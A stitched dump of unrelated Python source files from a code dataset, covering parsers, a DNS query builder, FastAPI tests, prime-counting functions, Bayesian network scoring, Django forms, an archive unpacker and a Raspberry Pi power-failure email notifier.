The idea is that this will be much more efficient to match against tags for
the vast majority of ASTs, which have many more raw words than they have
conditions.
A simplified AST is a list whose items are strings (representing bare
words) or tuples of the form (negated, flag, ast), where negated is a bool,
flag is a string and ast is another simplified ast.
"""
children = []
str_acc = []
for expr in raw_ast:
if isinstance(expr, str):
str_acc.append(expr)
continue
# We have a term that isn't a string. This must be a conditional. Join
# together any items in str_acc and add them to children then recurse
# to simplify the conditional's sub-expression.
if str_acc:
children.append(" ".join(str_acc))
str_acc = []
negated, flag, exprs = expr
children.append((negated, flag, _simplify_ast(exprs)))
if str_acc:
children.append(" ".join(str_acc))
return children
def _parse(string):
"""Parse a string to a simplified AST.
Raises a ValueError if the string is malformed in some way.
"""
try:
raw_ast = _get_parser().parseString(string, parseAll=True)
except ParseException as err:
raise ValueError(
"Invalid syntax for string: {}. Parsed text was {!r}.".format(err, string)
) from None
return _simplify_ast(raw_ast)
class Exprs:
"""A parsed list of exprs"""
def __init__(self, string):
self.ast = _parse(string)
self.as_string = None
# An extra optimisation for the common case where the whole ast boils
# down to a single string with no conditions.
if len(self.ast) == 1 and isinstance(self.ast[0], str):
self.as_string = self.ast[0]
@staticmethod
def _expand(ast, flag_defs):
"""Expand ast for the given flag_defs.
Returns a (possibly empty) list of strings
"""
expanded = []
for child in ast:
if isinstance(child, str):
expanded.append(child)
continue
# We have a conditional expression. Is the condition true? If not,
# skip it.
negated, flag, exprs = child
if (flag in flag_defs) == negated:
# The condition was false
continue
# The condition was true
expanded += Exprs._expand(exprs, flag_defs)
return expanded
@staticmethod
def _flags_to_flag_defs(flags):
"""Convert a flags dictionary to the set of flags that are defined"""
ret = []
for k, v in flags.items():
if v is True:
ret.append(k)
elif v not in [False, None]:
ret.append(k + "_" + v)
return set(ret)
def expand(self, flags):
"""Expand the parsed string in the presence of the given flags"""
if self.as_string is not None:
return self.as_string
flag_defs = Exprs._flags_to_flag_defs(flags)
return " ".join(Exprs._expand(self.ast, flag_defs))
| StarcoderdataPython |
1941341 | class Solution:
def pad_words(self, accumulated, L):
if len(accumulated) == 1:
return accumulated[0].ljust(max(len(accumulated[0]), L), ' ')
raw_size = sum([len(i) for i in accumulated])
remain_padding_size = L - raw_size
result = []
padded_words = 0
while padded_words < len(accumulated):
w = accumulated[padded_words]
if len(accumulated) - 1 == padded_words:
result.append(accumulated[-1])
break
if remain_padding_size % (len(accumulated) - padded_words - 1) == 0:
pad_size = remain_padding_size / (len(accumulated) - padded_words - 1)
else:
pad_size = remain_padding_size / (len(accumulated) - padded_words - 1) + 1
result.append(w.ljust(len(w) + pad_size, ' '))
remain_padding_size -= pad_size
padded_words += 1
return ''.join(result)
def deal_last_line(self, words, L):
return ' '.join(words).ljust(L, ' ')
# @param words, a list of strings
# @param L, an integer
# @return a list of strings
def fullJustify(self, words, L):
if len(words) == 1:
return [words[0].ljust(max(len(words[0]), L), ' ')]
accumulated = [words[0]]
accumulated_size = len(words[0])
result = []
lines = []
for w in words[1:]:
if accumulated_size + 1 + len(w) <= L:
accumulated.append(w)
accumulated_size += 1 + len(w)
else:
lines.append(accumulated)
accumulated = [w]
accumulated_size = len(w)
if len(accumulated) > 0:
lines.append(accumulated)
i = 0
while i < len(lines) - 1:
result.append(self.pad_words(lines[i], L))
i += 1
result.append(self.deal_last_line(lines[-1], L))
return result
s = Solution()
l = ["This", "is", "an", "example", "of", "text", "justification."]
print s.fullJustify(l, 1)
print s.fullJustify(l, 16)
print s.fullJustify([""], 6)
print s.fullJustify([""], 0)
print s.fullJustify(["a", "b", "c", "d", "e"], 3)
print s.fullJustify(["What","must","be","shall","be."], 12)
| StarcoderdataPython |
8082900 | #
# This module holds functions which are used to create our DNS requests.
#
import logging
import math
import random
import struct
logger = logging.getLogger()
#
# A lookup table for our query types.
#
query_types = {
"a": 1,
"ns": 2,
"md": 3,
"mf": 4,
"cname": 5,
"soa": 6,
"mb": 7,
"mg": 8,
"mr": 9,
"null": 10,
"wks": 11,
"ptr": 12,
"hinfo": 13,
"minfo": 14,
"mx": 15,
"txt": 16,
"aaaa": 28,
"axfr": 252,
"mailb": 253,
"maila": 254,
"*": 255,
}
def createHeader(args):
"""createHeader(args): Create a header for our question
An array of bytes is returned.
"""
retval = bytes()
if args.request_id:
#
# If the request ID is specified on the command line, parse the hex string.
#
request_id = int(args.request_id, 16)
if request_id > 65535:
raise Exception("Request ID of '%s' (%d) is over 65535!" % (
args.request_id, request_id))
else:
request_id = random.randint(0, 65535)
#
# The request ID is two bytes, so grab each byte, turn it into a char/string,
# and append it to the retval.
#
request_id1 = request_id >> 8
request_id2 = request_id & 0xff
retval += struct.pack("B", request_id1) + struct.pack("B", request_id2)
# Flags
flags = [0, 0]
#
# Opcode: 0 = standard query, 1 = inverse query, 2 = server status request
#
opcode = 0
#
# TODO:
# - Add support for setting opcode in flags[0]
# - Add support for TC in flags[0]
#
# Recursion desired?
rd = 1
flags[0] |= rd
#
# Add in our header
#
retval += struct.pack("B", flags[0]) + struct.pack("B", flags[1])
# QDCOUNT - Number of questions
qdcount = 1
retval += struct.pack(">H", qdcount)
# ANCOUNT - Number of answer
retval += struct.pack(">H", 0)
# NSCOUNT - Number of authority records
retval += struct.pack(">H", 0)
# ARCOUNT - Number of additional records
retval += struct.pack(">H", 0)
return(retval)
def createQuestion(q, query_type):
"""createQuestion(q, query_type): Create the question part of our query
An array of bytes is returned.
"""
retval = bytes()
#
# Split up our query, go through each part of it,
# and add the len and characters onto the question.
#
parts = q.split(".")
for part in parts:
retval += struct.pack("B", len(part))
retval += struct.pack("%ds" % len(part), bytes(part, "utf-8"))
#
# End the question with a zero.
#
retval += struct.pack("B", 0)
if query_type in query_types:
qtype = query_types[query_type]
else:
raise Exception("Unknown query_type: %s" % query_type)
retval += struct.pack(">H", qtype)
# QCLASS - 1 is IN
qclass = 1
retval += struct.pack(">H", qclass)
return(retval)
| StarcoderdataPython |
9692948 | from typing import List
import databases
import pytest
import sqlalchemy
from fastapi import FastAPI
from starlette.testclient import TestClient
import ormar
from tests.settings import DATABASE_URL
app = FastAPI()
metadata = sqlalchemy.MetaData()
database = databases.Database(DATABASE_URL, force_rollback=True)
app.state.database = database
@app.on_event("startup")
async def startup() -> None:
database_ = app.state.database
if not database_.is_connected:
await database_.connect()
@app.on_event("shutdown")
async def shutdown() -> None:
database_ = app.state.database
if database_.is_connected:
await database_.disconnect()
class Category(ormar.Model):
class Meta:
tablename = "categories"
metadata = metadata
database = database
id: int = ormar.Integer(primary_key=True)
name: str = ormar.String(max_length=100)
class Item(ormar.Model):
class Meta:
tablename = "items"
metadata = metadata
database = database
id: int = ormar.Integer(primary_key=True)
name: str = ormar.String(max_length=100)
categories: List[Category] = ormar.ManyToMany(Category)
@pytest.fixture(autouse=True, scope="module")
def create_test_database():
engine = sqlalchemy.create_engine(DATABASE_URL)
metadata.create_all(engine)
yield
metadata.drop_all(engine)
@app.post("/items/", response_model=Item)
async def create_item(item: Item):
await item.save_related(follow=True, save_all=True)
return item
@app.get("/items/{item_id}")
async def get_item(item_id: int):
item = await Item.objects.select_related("categories").get(pk=item_id)
return item.dict(exclude_primary_keys=True, exclude_through_models=True)
@app.get("/categories/{category_id}")
async def get_category(category_id: int):
category = await Category.objects.select_related("items").get(pk=category_id)
return category.dict(exclude_primary_keys=True)
@app.get("/categories/nt/{category_id}")
async def get_category_no_through(category_id: int):
category = await Category.objects.select_related("items").get(pk=category_id)
return category.dict(exclude_through_models=True)
@app.get("/categories/ntp/{category_id}")
async def get_category_no_pk_through(category_id: int):
category = await Category.objects.select_related("items").get(pk=category_id)
return category.dict(exclude_through_models=True, exclude_primary_keys=True)
@app.get(
"/items/fex/{item_id}",
response_model=Item,
response_model_exclude={
"id",
"categories__id",
"categories__itemcategory",
"categories__items",
},
)
async def get_item_excl(item_id: int):
item = await Item.objects.select_all().get(pk=item_id)
return item
def test_all_endpoints():
client = TestClient(app)
with client as client:
item = {
"name": "test",
"categories": [{"name": "test cat"}, {"name": "test cat2"}],
}
response = client.post("/items/", json=item)
item_check = Item(**response.json())
assert item_check.id is not None
assert item_check.categories[0].id is not None
no_pk_item = client.get(f"/items/{item_check.id}", json=item).json()
assert no_pk_item == item
no_pk_item2 = client.get(f"/items/fex/{item_check.id}", json=item).json()
assert no_pk_item2 == item
no_pk_category = client.get(
f"/categories/{item_check.categories[0].id}", json=item
).json()
assert no_pk_category == {
"items": [
{
"itemcategory": {"category": None, "id": 1, "item": None},
"name": "test",
}
],
"name": "test cat",
}
no_through_category = client.get(
f"/categories/nt/{item_check.categories[0].id}", json=item
).json()
assert no_through_category == {
"id": 1,
"items": [{"id": 1, "name": "test"}],
"name": "test cat",
}
no_through_category = client.get(
f"/categories/ntp/{item_check.categories[0].id}", json=item
).json()
assert no_through_category == {"items": [{"name": "test"}], "name": "test cat"}
| StarcoderdataPython |
9646345 | <filename>utils/noise.py
import numpy as np
import torch
class RandomActionNoise:
def __init__(self, action_dim, mu=0, theta=0.1, sigma=1):
self.action_dim = action_dim
self.mu = mu
self.theta = theta
self.sigma = sigma
self.x = np.ones(self.action_dim) * self.mu
def reset(self):
self.x = np.ones(self.action_dim) * self.mu
def sample(self):
dx = self.theta * (self.mu - self.x)
dx = dx + self.sigma * np.random.rand(len(self.x))
self.x = self.x + dx
return self.x | StarcoderdataPython |
1919821 | <reponame>upamanyus/primerunning<filename>src/primefunctions.py
class PrimeFunctions:
def __init__(self, textName):
primeFile = open(textName)
primeStrings = primeFile.read().split()
primeFile.close()
self.maxValue = int(primeStrings[0])
self.primes = [int(num) for num in primeStrings[1:]]
def walkingStep(self, a, q, p):
"""Returns 1 if p = a mod q, and 0 otherwise. Assumes that p is not
larger than self.maxValue."""
if p % q == a:
return 1
else:
return 0
def runningStep(self, a, q, n):
"""Returns 0 if largest prime less than or equal to n = a (mod q), and 1
otherwise. Assumes that n is larger self.maxValue."""
index = 0
if n < 2:
return 0
while self.primes[index] < n:
index += 1
if index >= len(self.primes) or self.primes[index] > n:
index -= 1
break
if self.primes[index] % q == a:
return 1
else:
return 0
def walkingSumPrimes(self, a, q):
"""Returns the output values of the prime walking function at prime
coordinates (i.e., the jth entry in the output array corresponds to the
jth prime number)."""
sum = 0
output = [0]
for p in self.primes[1:]:
if p % q == a:
sum += 1
output.append(sum)
return output
def runningSum(self, a, q, n):
"""Returns the prime running function evaluated at n."""
if n > self.maxValue:
raise RuntimeError("Number too large")
sum = 0
r = self.primes[0]
for p in self.primes[1:]:
if p > n:
sum += (n - r) * self.walkingStep(a, q, r)
return sum
sum += self.walkingStep(a, q, r) * (p - r)
r = p
return sum + (n - r) * self.walkingStep(a, q, r)
def runningSumPrimes(self, a, q):
"""Returns the output values of the prime running function at prime
coordinates (i.e., the jth entry in the output array corresponds to the
jth prime number)."""
r = self.primes[0]
sum = 0
output = [0]
for p in self.primes[1:]:
if r % q == a:
sum += (p - r - 1)
if p % q == a:
sum += 1
r = p
output.append(sum)
return output
def runningSumPrimesAll(self, q):
"""Returns an array of arrays, where the jth array contains the
output values of the prime running function j mod q."""
outputs = [[0] for a in range(q)] # TODO: Fix the starting coordinate
sums = [0 for a in range(q)]
r = self.primes[0]
for p in self.primes[1:]:
a = p % q
sums[a] += 1
b = r % q
sums[b] += p - r - 1
for i in range(q):
outputs[i].append(sums[i])
r = p
return outputs
| StarcoderdataPython |
8149615 | from __future__ import division
import numpy as np
import math
from decimal import Decimal
def MLEstimation(graph, data):
gragh_flip=np.array(map(list,zip(*graph)))
cptList=[]
for i in range(len(gragh_flip)):
variable=i
parents=[]
for k in range(len(gragh_flip[i])):
if gragh_flip[i][k]==1:
parents.append(k)
cpt=MLEstimationVariable(variable, parents, data)
cptList.append(cpt)
return cptList
def MLEstimationVariable(variable, parents, data):
data_flip=np.array(map(list,zip(*data)))
cpt=[]
possible_value=np.unique(data_flip[variable])
num_occur=[]
for i in possible_value:
num_occur.append(np.sum(data_flip[variable]==i))
if len(parents)==0:
for k in num_occur:
cpt.append([k/len(data_flip[variable])])
return cpt
else:
possible_value_pa=[]
for par in parents:
#each possible value that the parents could have
possible_value_pa.append(np.unique(data_flip[par]))
situation_possible=parents_enumerate(possible_value_pa)
# for each value parents get
for situation in range(len(situation_possible)):
cpt.append([])
Nj=0
situ=[0]*len(possible_value)
# for each case that fit the situation
for case in data:
cur_int=0
flag=True
# if a case really fit
while cur_int<len(parents):
if case[parents[cur_int]]==situation_possible[situation][cur_int]:
pass
else:
flag= False
break
cur_int+=1
if flag== False:
continue
else:
#it fit!
Nj+=1
for i in range(len(possible_value)):
if possible_value[i]==case[variable]:
situ[i]+=1
for b in range(len(situ)):
cpt[situation].append(situ[b]/len(data_flip[variable]))
return cpt
def log_dd(num):
digit=0
while num >10:
num/=10
digit+=1
return digit
def K2Score_log(variable, parents, data):
score=0
print score
possible_value=np.unique(data[variable])
r=len(possible_value)
if len(parents)==0:
Nj=len(data[variable])
num_occur=[]
for i in possible_value:
num_occur.append(np.sum(data[variable]==i))
try:
score+=log_dd(Decimal(math.factorial(r-1)))
score-=log_dd(Decimal(math.factorial(Nj+r-1)))
except ValueError:
pass
for b in range(len(num_occur)):
score+=log_dd(Decimal(math.factorial(num_occur[b])))
return score
else:
print score
possible_value_pa=[]
for par in parents:
#each possible value that the parents could have
possible_value_pa.append(np.unique(data[par]))
situation_possible=parents_enumerate(possible_value_pa)
data_flip=np.array(map(list,zip(*data)))
# for each value parents get
for situation in situation_possible:
Nj=0
situ=[0]*len(possible_value)
# for each case that fit the situation
for case in data_flip:
cur_int=0
flag=True
# if a case really fit
while cur_int<len(parents):
if case[parents[cur_int]]==situation[cur_int]:
pass
else:
flag= False
break
cur_int+=1
if flag== False:
continue
else:
#it fit!
Nj+=1
for i in range(len(possible_value)):
if possible_value[i]==case[variable]:
situ[i]+=1
try:
score+=log_dd(Decimal(math.factorial(r-1)))
score-=log_dd(Decimal(math.factorial(Nj+r-1)))
except ValueError:
pass
for b in range(len(situ)):
score+=log_dd(math.factorial(situ[b]))
return score
def BICScore(variable, parents, data):
score=0
possible_value=np.unique(data[variable])
r=len(possible_value)
if len(parents)==0:
Nj=len(data[variable])
num_occur=[]
for i in possible_value:
num_occur.append(np.sum(data[variable]==i))
for b in num_occur:
score+=b*math.log(b/Nj)
return 2*score
else:
possible_value_pa=[]
for par in parents:
#each possible value that the parents could have
possible_value_pa.append(np.unique(data[par]))
situation_possible=parents_enumerate(possible_value_pa)
data_flip=np.array(map(list,zip(*data)))
# for each value parents get
for situation in situation_possible:
Nj=0
situ=[0]*len(possible_value)
# for each case that fit the situation
for case in data_flip:
cur_int=0
flag=True
# if a case really fit
while cur_int<len(parents):
if case[parents[cur_int]]==situation[cur_int]:
pass
else:
flag= False
break
cur_int+=1
if flag== False:
continue
else:
#it fit!
Nj+=1
for i in range(len(possible_value)):
if possible_value[i]==case[variable]:
situ[i]+=1
for b in range(len(situ)):
try:
score+=situ[b]*math.log(situ[b]/Nj)
except (ValueError,ZeroDivisionError):
pass
return 2*score-len(possible_value_pa)*(r-1)*math.log(data.shape[1])
def parents_enumerate(parent_list):
num=1
for lists in parent_list:
num*= len(lists)
final=[]
for i in range(num):
final.append([])
for all_list in range(len(parent_list)):
cur=parent_list[all_list]
diff=len(cur)
itera=num
for i in range(0,all_list+1):
itera/=len(parent_list[i])
itera=int(itera)
index=0
numer=int(num/diff/itera)
for c in range(numer):
for l in cur:
for k in range(itera):
if index==0:
final[k].append(l)
else:
final[k+itera*index].append(l)
index+=1
return final
def K2Algorithm(K, data, scoreFunction):
data=np.array(map(list,zip(*data)))
gragh=[]
n=data.shape[0]
parents= [-1]*n
total_score=0
for i in range(n):
print "-----------------------------------"
print "Current node "+ str(i)
if i==0:
gragh.append([0]*n)
total_score+=scoreFunction(i,[],data)
print "No parent for the first node"
print ""
print ""
continue
parents[i]=[]
gragh_list=[0]*n
score=scoreFunction(i,parents[i],data)
print "Old score = "+ str(score)
print "-----------------------------------"
countinue=True
digit=0
#to testify the parents of each node
while countinue and len(parents[i])<K:
data_list=[range(n)]
for k in range(i,n):
data_list[0].remove(k)
for c in parents[i]:
data_list[0].remove(c)
if len(data_list[0])==0:
print "reach the end of this node"
break
#the testify the n-th parents of each node
max_score=float('-inf')
max_parents=None
#find the max score for each other node
parents[i].append([-1])
for b in data_list[0]:
print "considering adding node" +str((i,b))
parents[i][digit]=b
score_temp=scoreFunction(i,parents[i],data)
if score_temp>max_score:
max_score=score_temp
max_parents=b
print "temporary adding node"+str((i,b))
print "Temp score = "+ str(score_temp)
print "Current max score = "+ str(max_score)
print " "
else:
print "No adding node"+str((i,b))
print "Temp score = "+ str(score_temp)
print "Current max score = "+ str(max_score)
print " "
sNew=max_score
if sNew>score:
print "New score = "+ str(sNew)
print "Old score = "+ str(score)
print "adding node"+str((i,max_parents))
print "-----"
print "next node to go "
print "-----"
score=sNew
parents[i][digit]=max_parents
digit+=1
else:
parents[i][digit]=None
print "New score = "+ str(sNew)
print "Old score = "+ str(score)
print "Not adding node"+str((i,max_parents))
print "No result for parent " + str(digit+1)
print ""
countinue=False
try:
parents[i].remove(None)
except ValueError:
pass
for par in parents[i]:
gragh_list[par]=1
gragh.append(gragh_list)
total_score+=score
print ""
print "Total score = " +str(total_score)
print ""
print ""
gragh=np.array(map(list,zip(*gragh)))
print "Final gragh "
print str(gragh)
print "Final Score"
print total_score
return [gragh, total_score]
def K2Score(variable, parents, data):
score=1
possible_value=np.unique(data[variable])
r=len(possible_value)
if len(parents)==0:
Nj=len(data[variable])
num_occur=[]
for i in possible_value:
num_occur.append(np.sum(data[variable]==i))
score*=Decimal(math.factorial(r-1))/Decimal(math.factorial(Nj+r-1))
for b in range(len(num_occur)):
score*=Decimal(math.factorial(num_occur[b]))
return score
else:
possible_value_pa=[]
for par in parents:
#each possible value that the parents could have
possible_value_pa.append(np.unique(data[par]))
situation_possible=parents_enumerate(possible_value_pa)
data_flip=np.array(map(list,zip(*data)))
# for each value parents get
for situation in situation_possible:
Nj=0
situ=[0]*len(possible_value)
# for each case that fit the situation
for case in data_flip:
cur_int=0
flag=True
# if a case really fit
while cur_int<len(parents):
if case[parents[cur_int]]==situation[cur_int]:
pass
else:
flag= False
break
cur_int+=1
if flag== False:
continue
else:
#it fit!
Nj+=1
for i in range(len(possible_value)):
if possible_value[i]==case[variable]:
situ[i]+=1
score*=Decimal(math.factorial(r-1))/Decimal(math.factorial(Nj+r-1))
for b in range(len(situ)):
if situ[b]==0:
continue
score*=Decimal(math.factorial(situ[b]))
return score
| StarcoderdataPython |
92565 | <gh_stars>1-10
#! /usr/bin/env python
# Use setuptools, falling back on provide
try:
from setuptools import setup, find_packages
except ImportError:
import distribute_setup
distribute_setup.use_setuptools()
from setuptools import setup, find_packages
import sys
from seqmagick import __version__ as version
if sys.version_info < (2, 7):
print 'ERROR: seqmagick requires at least Python 2.7 to run.'
sys.exit(1)
requires = ['biopython>=1.58']
setup(name='seqmagick',
version=version,
description='Tools for converting and modifying sequence files '
'from the command-line',
url='http://github.com/fhcrc/seqmagick',
download_url='http://pypi.python.org/pypi/seqmagick',
author='<NAME>',
author_email='http://matsen.fhcrc.org/',
packages=find_packages(),
entry_points={
'console_scripts': [
'seqmagick = seqmagick.scripts.cli:main'
]},
package_data={'seqmagick.test.integration': ['data/*']},
setup_requires=['nose>=1.0'],
test_suite='nose.collector',
install_requires=requires,
classifiers=[
'License :: OSI Approved :: GNU General Public License (GPL)',
'Development Status :: 3 - Alpha',
'Programming Language :: Python :: 2.7',
'Topic :: Scientific/Engineering :: Bio-Informatics',
],
license="GPL V3",
)
| StarcoderdataPython |
3337850 | from django import forms
from users.models import User
class UserForm(forms.ModelForm):
name = forms.CharField(widget=forms.TextInput(attrs={'class':'form-control'}))
lastname = forms.CharField(widget=forms.TextInput(attrs={'class':'form-control'}))
email = forms.CharField(widget=forms.EmailInput(attrs={'class':'form-control'}))
username = forms.CharField(widget=forms.TextInput(attrs={'class':'form-control'}))
password = forms.CharField(widget=forms.PasswordInput(attrs={'class':'form-control'}))
class Meta:
model = User
""" fields = __all__ => equivale a todos los campos """
fields = [
'name',
'lastname',
'email',
'username',
'password',
]
labels = {
'name': 'Name',
'lastname': 'Lastname',
'email': 'Email',
'username': 'Username',
'password': 'Password',
}
| StarcoderdataPython |
1709393 | <gh_stars>0
from django import forms
from .models import *
from pyuploadcare.dj.forms import ImageField
from django.contrib.auth.models import User
class EditProfileForm(forms.ModelForm):
"""
Form to edit user profile
"""
class Meta:
model=User_profile
fields = ('bio','profile_pic','email','phone_number')
class UpdateProfileForm(forms.ModelForm):
'''
Form to add user profile
'''
class Meta:
model = User_profile
fields = ('bio','profile_pic','email','phone_number')
class NewProjectForm(forms.ModelForm):
'''
Form that allows user to post new project
'''
class Meta:
model = Projects
fields = ('title','image','description','project_link')
class ReviewForm(forms.ModelForm):
"""
Form that allows user post a review for a project
"""
class Meta:
model=Review
exclude = ['project','posted_by']
class RateForm(forms.ModelForm):
'''
Form that allows a user to rate a project
'''
class Meta:
model=Rate
exclude = ['post_rated','user','date']
| StarcoderdataPython |
3202760 | from serene_load.helpers.containers.container_base import TempFileContainer, BaseContainer, BaseProcessor
import logging
import datetime
import io
import re
import subprocess
log = logging.getLogger()
class SevenZipFileContainer(TempFileContainer):
def decompress(self, source, target):
subprocess.check_call("/usr/bin/7za e '{}' '{}' -so > {}".format(source, self.filename(), target), stderr=io.open('/dev/null', 'w'), shell=True)
BaseContainer.add_container_type(SevenZipFileContainer)
with_dt = re.compile(
r'(?P<year>[\d]{4})-(?P<month>[\d]{2})-(?P<day>[\d]{2}) (?P<hour>[\d]{2}):(?P<minute>[\d]{2}):(?P<second>[\d]{2}) [^\s]{5}[\s\t]+(?P<size>[\d]+)[\s\t\d]+[\s]+(?P<name>.*)$',
)
no_dt = re.compile(
r'^[\s]+[^\s]{5}[\s\t]+(?P<size>[\d]+)[\s\t\d]+[\s]+(?P<name>.*)$',
)
class SevenZipFileProcessor(BaseProcessor):
@classmethod
def valid(cls, args, input_file):
with input_file as infile:
fp = infile.instantiate_file()
try:
subprocess.check_call(u'7za l "{}" >& /dev/null'.format(fp), shell=True)
return True
except subprocess.CalledProcessError:
return False
@classmethod
def unpack(cls, args, input_file):
with input_file as infile:
fp = infile.instantiate_file()
log.debug(u'using {} for {}'.format(fp, input_file))
output = subprocess.check_output(u"7za l '{}'".format(fp), shell=True)
file_listing = False
for line in output.split('\n'):
if file_listing:
if line.startswith('----'):
file_listing = False
continue
if line[4] == '-':
match = with_dt.match(line)
mtime = datetime.datetime(
year=int(match.group('year')),
month=int(match.group('month')),
day=int(match.group('day')),
hour=int(match.group('hour')),
minute=int(match.group('minute')),
second=int(match.group('second')),
).isoformat()[:19]
else:
mtime = None
match = no_dt.match(line)
if match is None:
raise Exception(line)
filename = match.group('name').strip()
assert not filename == 'file'
sz = SevenZipFileContainer(input_fd=input_file, file=filename, job_args=args)
d = {
'next_func': 'hash',
'accessor': sz,
'file': filename,
'path': input_file.relative_path()
}
if mtime:
d.update({
'mtime': mtime
})
yield d
else:
if line.startswith('----'):
file_listing = True
| StarcoderdataPython |
4934819 | <reponame>khaledboka/point_to_line<gh_stars>0
from django.apps import AppConfig
from . import APP_NAME
class PointToLineConfig(AppConfig):
name = APP_NAME
verbose_name = "Point To Line"
| StarcoderdataPython |
1947115 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import RPi.GPIO as GPIO
import time
from time import sleep
import datetime
import serial
import os
import smtplib
from email.mime.text import MIMEText
GPIO.setmode(GPIO.BCM)
#Here you can choose whether you want to receive an email when the Raspberry Pi restarts - 1 to activate - 0 to deactivate
Restart_Mail = 1
# This is The config for the EMAIL notification
#----------------------------------------------
SERVER = 'SMTP.Beispiel.DE'
PORT = 587
EMAIL = '<EMAIL>'
PASSWORT = '<PASSWORD>'
EMPFAENGER = ['<EMAIL>' , '<EMAIL>']
SUBJECT_Powerfail = 'Raspberry Pi Powerfail!'
SUBJECT_Powerback = 'Raspberry Pi Powerback!'
SUBJECT_Restart = 'Raspberry Pi Restart!'
#----------------------------------------------
serial_port = serial.Serial(
port='/dev/serial0',
baudrate = 38400,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=3
)
if serial_port.isOpen(): serial_port.close()
serial_port.open()
serial_port.write(str.encode('Q'))
sleep(1)
serial_port.write(str.encode('\x0D'))
sleep(1)
serial_port.write(str.encode('date-rpi'))
sleep(0.1)
serial_port.write(str.encode('\x0D'))
data = serial_port.read(9999);
date = int(data)
strompi_year = date // 10000
strompi_month = date % 10000 // 100
strompi_day = date % 100
sleep(0.1)
serial_port.write(str.encode('time-rpi'))
sleep(0.1)
serial_port.write(str.encode('\x0D'))
data = serial_port.read(9999);
timevalue = int(data)
strompi_hour = timevalue // 10000
strompi_min = timevalue % 10000 // 100
strompi_sec = timevalue % 100
rpi_time = datetime.datetime.now().replace(microsecond=0)
strompi_time = datetime.datetime(2000 + strompi_year, strompi_month, strompi_day, strompi_hour, strompi_min, strompi_sec, 0)
command = 'set-time %02d %02d %02d' % (int(rpi_time.strftime('%H')),int(rpi_time.strftime('%M')),int(rpi_time.strftime('%S')))
if rpi_time > strompi_time:
serial_port.write(str.encode('set-date %02d %02d %02d %02d') % (int(rpi_time.strftime('%d')),int(rpi_time.strftime('%m')),int(rpi_time.strftime('%Y'))%100,int(rpi_time.isoweekday())))
sleep(0.5)
serial_port.write(str.encode('\x0D'))
sleep(1)
serial_port.write(str.encode('set-clock %02d %02d %02d') % (int(rpi_time.strftime('%H')),int(rpi_time.strftime('%M')),int(rpi_time.strftime('%S'))))
sleep(0.5)
serial_port.write(str.encode('\x0D'))
print ("-----------------------------------------")
print ("The date und time has been synced: Raspberry Pi -> StromPi")
print ("-----------------------------------------")
else:
os.system('sudo date +%%y%%m%%d --set=%02d%02d%02d' % (strompi_year, strompi_month, strompi_day))
os.system('sudo date +%%T -s "%02d:%02d:%02d"' % (strompi_hour, strompi_min, strompi_sec))
print ("-----------------------------------------")
print ("The date und time has been synced: StromPi -> Raspberry Pi")
print ("-----------------------------------------")
if serial_port.isOpen(): serial_port.close()
serial_port.open()
serial_port.write(str.encode('quit'))
time.sleep(0.1)
serial_port.write(str.encode('\x0D'))
time.sleep(0.2)
serial_port.write(str.encode('set-config 0 2'))
time.sleep(0.1)
serial_port.write(str.encode('\x0D'))
time.sleep(0.2)
print ("Enabled Serialless")
print ("E-Mail notification in case of Powerfailure (CTRL-C for exit)")
# Set pin as input
def Sendmail_Restart():
BODY = """
<html>
<head></head>
<body>
<style type="text/css">
.tg {border-collapse:collapse;border-spacing:0;}
.tg td{font-family:Arial, sans-serif;font-size:14px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;}
.tg th{font-family:Arial, sans-serif;font-size:14px;font-weight:normal;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;}
.tg .tg-0ord{text-align:right}
.tg .tg-qnmb{font-weight:bold;font-size:16px;text-align:center}
</style>
<table class="tg">
<tr>
<th class="tg-qnmb" colspan="2">Ihr Raspberry Pi wurde neugestartet.</th>
</tr>
</table>
</body>
</html>
"""
session = smtplib.SMTP(SERVER, PORT)
session.set_debuglevel(1)
session.ehlo()
session.starttls()
session.ehlo
session.login(EMAIL, PASSWORT)
msg = MIMEText(BODY, 'html')
msg['Subject'] = SUBJECT_Restart
msg['From'] = EMAIL
msg['To'] = ", ".join(EMPFAENGER)
session.sendmail(EMAIL, EMPFAENGER, msg.as_string())
Detect_Powerfail()
def Sendmail_Powerfail():
BODY = """
<html>
<head></head>
<body>
<style type="text/css">
.tg {border-collapse:collapse;border-spacing:0;}
.tg td{font-family:Arial, sans-serif;font-size:14px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;}
.tg th{font-family:Arial, sans-serif;font-size:14px;font-weight:normal;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;}
.tg .tg-0ord{text-align:right}
.tg .tg-qnmb{font-weight:bold;font-size:16px;text-align:center}
</style>
<table class="tg">
<tr>
<th class="tg-qnmb" colspan="2">StromPi hat einen STROMAUSFALL erkannt!!!!</th>
</tr>
</table>
</body>
</html>
"""
session = smtplib.SMTP(SERVER, PORT)
session.set_debuglevel(1)
session.ehlo()
session.starttls()
session.ehlo
session.login(EMAIL, PASSWORT)
msg = MIMEText(BODY, 'html')
msg['Subject'] = SUBJECT_Powerfail
msg['From'] = EMAIL
msg['To'] = ", ".join(EMPFAENGER)
session.sendmail(EMAIL, EMPFAENGER, msg.as_string())
Detect_Powerback()
def Sendmail_Powerback():
BODY = """
<html>
<head></head>
<body>
<style type="text/css">
.tg {border-collapse:collapse;border-spacing:0;}
.tg td{font-family:Arial, sans-serif;font-size:14px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;}
.tg th{font-family:Arial, sans-serif;font-size:14px;font-weight:normal;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;}
.tg .tg-0ord{text-align:right}
.tg .tg-qnmb{font-weight:bold;font-size:16px;text-align:center}
</style>
<table class="tg">
<tr>
<th class="tg-qnmb" colspan="2">StromPi hat Spannung wiedererkannt!</th>
</tr>
</table>
</body>
</html>
"""
session = smtplib.SMTP(SERVER, PORT)
session.set_debuglevel(1)
session.ehlo()
session.starttls()
session.ehlo
session.login(EMAIL, PASSWORT)
msg = MIMEText(BODY, 'html')
msg['Subject'] = SUBJECT_Powerback
msg['From'] = EMAIL
msg['To'] = ", ".join(EMPFAENGER)
session.sendmail(EMAIL, EMPFAENGER, msg.as_string())
Detect_Powerfail()
def Detect_Powerback():
while 1:
x=serial_port.readline()
